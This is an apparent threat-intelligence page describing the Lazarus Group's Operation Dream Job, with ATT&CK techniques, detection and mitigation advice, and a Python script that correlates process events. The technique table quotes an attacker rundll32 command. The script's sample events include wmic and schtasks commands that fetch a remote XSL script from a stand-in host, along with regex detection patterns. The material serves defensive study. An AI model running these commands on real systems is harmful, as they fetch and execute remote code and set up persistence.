C0022: Operation Dream Job
Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]
Analyst context for executives and security teams
Operation Dream Job matters because ATT&CK describes it as a cyber espionage campaign using fake job lures against defense, aerospace, government, and other sectors, with at least one reported attempt to monetize access through business email compromise. For leaders, the practical issue is not just malware: it is whether recruiting-themed social engineering, credential exposure, remote execution, persistence, data collection, and exfiltration would be noticed quickly enough to protect sensitive programs and business communications.
Executive priority
Prioritize this as a resilience and sensitive-data protection scenario for organizations with high-value intellectual property, government-facing work, or executives and staff likely to receive career-themed outreach. Leadership should ask whether SOC, identity, email/web security, endpoint, and incident response teams can prove coverage across the full chain: user interaction with a malicious link or file, Windows execution and persistence behaviors, credential attack activity, internal discovery, tool transfer, and exfiltration over web-like command-and-control traffic. It is also useful as audit evidence for security awareness, endpoint monitoring, privileged access controls, and incident response readiness.
Technical view
The campaign object has no ATT&CK-provided detection text and no campaign-level platforms or tactics, so validation should be driven by its relationships. ATT&CK links the campaign to Lazarus Group and to tools including Responder, Torisma, and DRATzarus, plus techniques covering user execution via malicious links/files, PowerShell, Windows command shell, Visual Basic, WMI, Scheduled Task, Regsvr32, Native API, file and directory discovery, domain account discovery, brute force, ingress tool transfer, obfuscation, masqueraded file types, file deletion, web protocol C2, local data collection, and exfiltration over C2. SOC teams should test whether alerts correlate these behaviors into an intrusion narrative rather than treating them as isolated low-severity events.
Likely telemetry
- Email, web gateway, browser, and user-reporting evidence related to fake job lures, malicious links, and malicious files
- Endpoint process creation and command-line telemetry for PowerShell, cmd.exe, WMI, scheduled tasks, regsvr32.exe, Visual Basic-related execution, and unusual native API-driven behavior where available
- Windows event logs and EDR records for task creation, remote/local WMI activity, script execution, file creation/deletion, packed or encoded files, and masqueraded file types
- Identity provider, directory service, VPN, and authentication logs for brute force attempts and domain account enumeration
- Network telemetry for HTTP/S or other web protocol command-and-control patterns, tool transfer, and possible exfiltration over an existing C2 channel
Detection direction
- Because ATT&CK provides no official detection section for this campaign, map detections to the related techniques and confirm they work in the local environment.
- Correlate user-driven execution events from links or files with follow-on interpreter, WMI, scheduled task, regsvr32, tool transfer, discovery, and outbound web traffic rather than relying only on malware signatures.
- Tune for living-off-the-land behavior: PowerShell, cmd, WMI, scheduled tasks, and regsvr32 are legitimate administration tools, so detection should emphasize unusual parent/child processes, command-line content, timing, user context, remote origin, and sequence of actions.
- Validate visibility into credential-access paths, especially brute force signals and Responder-like name-resolution or rogue authentication activity, since these may be missed if identity and network telemetry are not joined.
- Review blind spots around encrypted or packed payloads, masqueraded file types, and file deletion, which can reduce the value of static file signatures and post-incident artifact recovery.
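The correlation the bullets above call for, shown as an added example that is not code from ATT&CK, Glexia or the cited reports: a small Python rule set run over constructed EDR-style process-creation records (the record schema, hostnames, user names, the cdn.example.invalid URL and the benign events are assumptions; the rundll32 command line is the one quoted in the technique table below), which groups living-off-the-land hits per host into one chain instead of isolated low-severity alerts.

```python
"""Correlate living-off-the-land process events into one intrusion chain.
Added example; the events are constructed and modelled on the Operation
Dream Job procedures on this page. Field names are an assumed EDR schema."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe",
         "wmic.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# (technique id, description, predicate over lower-cased parent, image, cmdline)
RULES = [
    ("T1204.002", "Office application spawned a script or LOLBin host",
     lambda p, i, c: p in OFFICE and i in HOSTS),
    ("T1220", "wmic /format: pointing at a remote XSL script",
     lambda p, i, c: i == "wmic.exe"
     and re.search(r'/format:\s*"?https?://', c) is not None),
    ("T1218.011", "rundll32 loading a payload with a non-DLL extension",
     lambda p, i, c: i == "rundll32.exe"
     and re.search(r"\.(db|jpg|jpeg|png|txt)\b", c) is not None),
    ("T1218.010", "regsvr32 with scrobj.dll or a remote /i: target",
     lambda p, i, c: i == "regsvr32.exe"
     and re.search(r'scrobj\.dll|/i:\s*"?https?://', c) is not None),
    ("T1053.005", "schtasks creating a task whose action runs wmic",
     lambda p, i, c: i == "schtasks.exe" and "/create" in c and "wmic" in c),
]

def ev(ts, host, user, parent, image, cmdline):
    """Build one constructed process-creation record (assumed schema)."""
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent, "image": image, "cmdline": cmdline}

# Constructed sample telemetry: one victim workstation plus benign admin noise.
SAMPLE_EVENTS = [
    ev("2020-06-17T09:02:00", "WS-0417", "j.doe", "WINWORD.EXE", "cmd.exe",
       r'cmd.exe /c mkdir C:\ProgramData\ThumbNail'),
    ev("2020-06-17T09:03:00", "WS-0417", "j.doe", "cmd.exe", "rundll32.exe",
       r'C:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", '
       r'CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905'),
    ev("2020-06-17T09:10:00", "WS-0417", "j.doe", "cmd.exe", "wmic.exe",
       'wmic.exe os get /format:"https://cdn.example.invalid/update.xsl"'),
    ev("2020-06-17T09:12:00", "WS-0417", "j.doe", "cmd.exe", "schtasks.exe",
       'schtasks.exe /create /tn "OneDrive Sync" /sc minute /mo 30 '
       '/tr "wmic os get /format:https://cdn.example.invalid/update.xsl"'),
    ev("2020-06-17T09:15:00", "ADMIN-01", "it.admin", "explorer.exe",
       "powershell.exe", "powershell.exe -Command Get-Service"),
    ev("2020-06-17T09:20:00", "WS-0999", "a.smith", "explorer.exe",
       "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

def match_rules(event):
    """Return the technique ids whose predicate matches one event."""
    p, i, c = (event["parent"].lower(), event["image"].lower(),
               event["cmdline"].lower())
    return [tid for tid, _, pred in RULES if pred(p, i, c)]

def correlate(events, window=timedelta(hours=1), min_hits=3):
    """Group rule hits per host; a host with >= min_hits distinct techniques
    inside `window` of its first hit becomes one escalated chain."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        for tid in match_rules(e):
            hits[e["host"]].append((e["ts"], tid, e["user"]))
    chains = {}
    for host, hs in hits.items():
        start = hs[0][0]
        in_window = [h for h in hs if h[0] - start <= window]
        techs = sorted({tid for _, tid, _ in in_window})
        if len(techs) >= min_hits:
            chains[host] = {
                "techniques": techs,
                "users": sorted({u for _, _, u in in_window}),
                "span_minutes": int((in_window[-1][0] - start).total_seconds() // 60),
            }
    return chains

if __name__ == "__main__":
    for host, chain in correlate(SAMPLE_EVENTS).items():
        print(host, chain)  # WS-0417 is the only host that forms a chain
```

Each predicate on its own is noisy on an admin workstation; the value is in the per-host grouping, which is why the benign PowerShell and rundll32 events never surface.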
Mitigation priorities
- Start with reducing successful user execution: reinforce verification of unsolicited job or recruiting outreach, and ensure suspicious links/files can be reported and investigated quickly.
- Harden email, web, and endpoint controls for malicious links, malicious files, packed or encoded content, and masqueraded file types; use prevention where feasible but retain telemetry for investigation.
- Strengthen identity controls against brute force and account misuse, including MFA where applicable, lockout/rate-limiting policies, monitoring of domain account enumeration, and review of privileged account exposure.
- Limit and monitor administrative execution paths such as PowerShell, WMI, scheduled tasks, cmd, Visual Basic, and regsvr32 based on business need and role.
- Reduce credential capture opportunities from local name-resolution abuse by reviewing LLMNR/NBT-NS/MDNS exposure and related authentication flows where Responder-like behavior would be material.
Analyst notes and limits
The most decision-useful aspect of this campaign object is the combination of social engineering via fake job lures, Windows and cross-platform execution/stealth techniques, credential-focused activity, and data collection/exfiltration relationships. Treat it as a coverage validation scenario for managed detection, incident response, identity security, endpoint detection, and egress monitoring. Sector and country targeting are from the official ATT&CK description; they should inform prioritization but not be treated as proof of current exposure.
ATT&CK does not provide campaign-level platforms, tactics, labels, or official detection guidance for this object. The technical recommendations are inferred only from the supplied ATT&CK relationships and related object descriptions. Local asset inventory, telemetry quality, business process context, and incident evidence are required before assessing exposure or detection coverage.
Operation Dream Job
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1614.001 | System Language Discovery Sub-technique | During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1608.001 | Upload Malware Sub-technique | For Operation Dream Job, Lazarus Group used compromised servers to host malware. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020) |
| Enterprise | T1218.011 | Rundll32 Sub-technique | During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1106 | Native API | During Operation Dream Job, Lazarus Group used the Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server. (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1585.001 | Social Media Accounts Sub-technique | For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1036.008 | Masquerade File Type Sub-technique | During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection. (Citation: McAfee Lazarus Jul 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1070.004 | File Deletion Sub-technique | During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence. (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1497.001 | System Checks Sub-technique | During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1059.005 | Visual Basic Sub-technique | During Operation Dream Job, Lazarus Group executed a VBA-written malicious macro after victims downloaded malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64-encoded DLL implant. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1608.002 | Upload Tool Sub-technique | For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1105 | Ingress Tool Transfer | During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1585.002 | Email Accounts Sub-technique | During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1584.001 | Domains Sub-technique | For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure. (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020) |
| Enterprise | T1583.004 | Server Sub-technique | During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server. (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1204.001 | Malicious Link Sub-technique | During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1059.001 | PowerShell Sub-technique | During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1591 | Gather Victim Org Information | For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1583.001 | Domains Sub-technique | During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1221 | Template Injection | During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1497.003 | Time Based Checks Sub-technique | During Operation Dream Job, Lazarus Group used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1589 | Gather Victim Identity Information | For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1553.002 | Code Signing Sub-technique | During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1005 | Data from Local System | During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1110 | Brute Force | During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1041 | Exfiltration Over C2 Channel | During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1534 | Internal Spearphishing | During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1684.001 | Impersonation Sub-technique | During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: The Hacker News Lazarus Aug 2022) |
| Enterprise | T1583.006 | Web Services Sub-technique | During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1591.004 | Identify Roles Sub-technique | During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1204.002 | Malicious File Sub-technique | During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1588.003 | Code Signing Certificates Sub-technique | During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1087.002 | Domain Account Sub-technique | During Operation Dream Job, Lazarus Group queried the compromised victim's Active Directory servers to obtain the list of employees, including administrator accounts. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1587.002 | Code Signing Certificates Sub-technique | During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1505.004 | IIS Components Sub-technique | During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components. (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1083 | File and Directory Discovery | During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | During Operation Dream Job, Lazarus Group used `regsvr32` to execute malware. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1047 | Windows Management Instrumentation | During Operation Dream Job, Lazarus Group used WMIC to execute a remote XSL script. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1027.002 | Software Packing Sub-technique | During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection. (Citation: ClearSky Lazarus Aug 2020) (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020) |
| Enterprise | T1588.002 | Tool Sub-technique | For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During Operation Dream Job, Lazarus Group used HTTP and HTTPS to contact actor-controlled C2 servers. (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage Sub-technique | During Operation Dream Job, Lazarus Group used a custom build of the open-source command-line tool dbxcli to exfiltrate stolen data to Dropbox. (Citation: ESET Lazarus Jun 2020) (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1622 | Debugger Evasion | During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers. (Citation: ClearSky Lazarus Aug 2020) |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020) |
| Enterprise | T1220 | XSL Script Processing | During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1587.001 | Malware Sub-technique | For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell. (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1584.004 | Server Sub-technique | For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) (Citation: McAfee Lazarus Jul 2020) |
| Enterprise | T1593.001 | Social Media Sub-technique | For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization. (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email. (Citation: ClearSky Lazarus Aug 2020) (Citation: ESET Lazarus Jun 2020) |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | During Operation Dream Job, Lazarus Group archived the victim's data into a RAR file. (Citation: ESET Lazarus Jun 2020) |
Groups, software, and campaigns
G0032: Lazarus Group
Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB).[1][2] Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]
North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.[4][5][6]
S0678: Torisma
Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[1]
S0174: Responder
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.[1]
S0694: DRATzarus
DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | 61eb67786367… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] ClearSky Lazarus Aug 2020: ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
- [2] McAfee Lazarus Jul 2020: Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
- [3] ESET Lazarus Jun 2020: Breitenbacher, D. and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
- [4] The Hacker News Lazarus Aug 2022: Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.
- [5] McAfee Lazarus Nov 2020: Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
- [6] Operation Interception (alias): (Citation: ESET Lazarus Jun 2020)
- [7] Operation North Star (alias): (Citation: McAfee Lazarus Jul 2020) (Citation: McAfee Lazarus Nov 2020)
- [8] mitre-attack: C0022
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.